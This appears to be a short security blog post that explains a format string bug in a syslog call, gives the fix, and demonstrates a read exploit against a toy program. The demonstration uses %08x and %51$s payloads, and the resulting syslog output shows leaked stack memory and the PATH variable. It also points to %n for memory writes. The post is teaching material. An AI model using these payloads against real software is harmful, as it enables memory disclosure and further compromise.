So the answer to Monday’s problem was

syslog(LOG_INFO, argv[1]);

Is a format string vulnerability. To solve the problem the line should be written as such

syslog(LOG_INFO, "%s", argv[1]);

Now what can be done with this is quite a lot. Enter in the following ./logit perl -e 'print "%08X:"x100' and then look at you system logs. What you are looking at is a dump of the programs stack. But you can get access to read any area in memory you have access to read. So on my system which is an AMD64 System if I run the following;

./a.out $(perl -e ‘print “%08x:” x 50 . “%s”‘)

And view syslog, I see;

Apr 2 11:37:52 logfile[23995]: 00000008:00000000:004006bc:00000003:ffffe798:00000000:00000000:f7aa7b6d:00000000:ffffe798:00000000:00400564: 00000000:af958099:00400480:ffffe790:00000000:00000000:62158099:59c58099:00000000:00000000:00000000:004005e0: ffffe798:00000002:00000000:00000000:00400480:ffffe790:00000000:004004a9:ffffe788:0000001c:00000002:ffffea5c:ffffea64: 00000000:ffffeb61:ffffeb86:ffffebc2:ffffebd2:ffffebe5:ffffebf3:ffffebff:ffffec17:ffffec29:ffffec37:ffffec40:ffffec69:PATH=/opt/wine/bin:/bin:/usr/bin:/sbin:/usr/sbin:/opt/java/bin:/opt/java/jre/bin:/usr/bin/perlbin/site:/usr/bin/perlbin/vendor:/usr/bin/perlbin/core:/opt/qt/bin

Or more directly without using perl.

./a.out %51\$s

and see Apr 2 12:09:57 logfile[24110]: PATH=/opt/wine/bin:/bin:/usr/bin:/sbin:/usr/sbin:/opt/java/bin:/opt/java/jre/bin:/usr/bin/perlbin/site:/usr/bin/perlbin/vendor:/usr/bin/perlbin/core:/opt/qt/bin

Which has my PATH variable in it. So I am able to read to anyplace I want in memory, but what about write. Well it turns out I can do that as well. Using a %n we can write the amount of data written to an associated memory address. Ill leave that as an exercise for the reader though. Or maybe if I can’t think of anything else to post Ill do a write up on that as well.